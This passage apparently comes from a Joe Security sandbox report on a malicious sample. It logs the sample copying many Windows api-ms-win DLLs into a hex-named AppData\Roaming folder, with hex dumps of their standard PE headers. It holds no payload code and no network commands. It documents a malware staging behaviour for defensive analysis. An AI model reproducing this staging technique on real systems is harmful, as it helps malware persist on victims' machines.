Copyright Joe Security LLC 2018 Page 125 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 126 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll
0 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll
0 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 127 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll
0 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 128 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll
0 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 129 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll
0 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 130 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll
0 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 131 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-util-l1-1-0.dll
0 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-conio-l1-1-0.dll
0 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 e3 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 132 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-convert-l1-1-0.dll
0 22208 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 0a 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 133 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll
0 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 134 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dll
0 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 06 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................
success or wait 1 2E30C7 CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dll
0 28864 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 2e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................@.....................
success or wait 1 2E30C7 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Copyright Joe Security LLC 2018 Page 135 of 149
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll
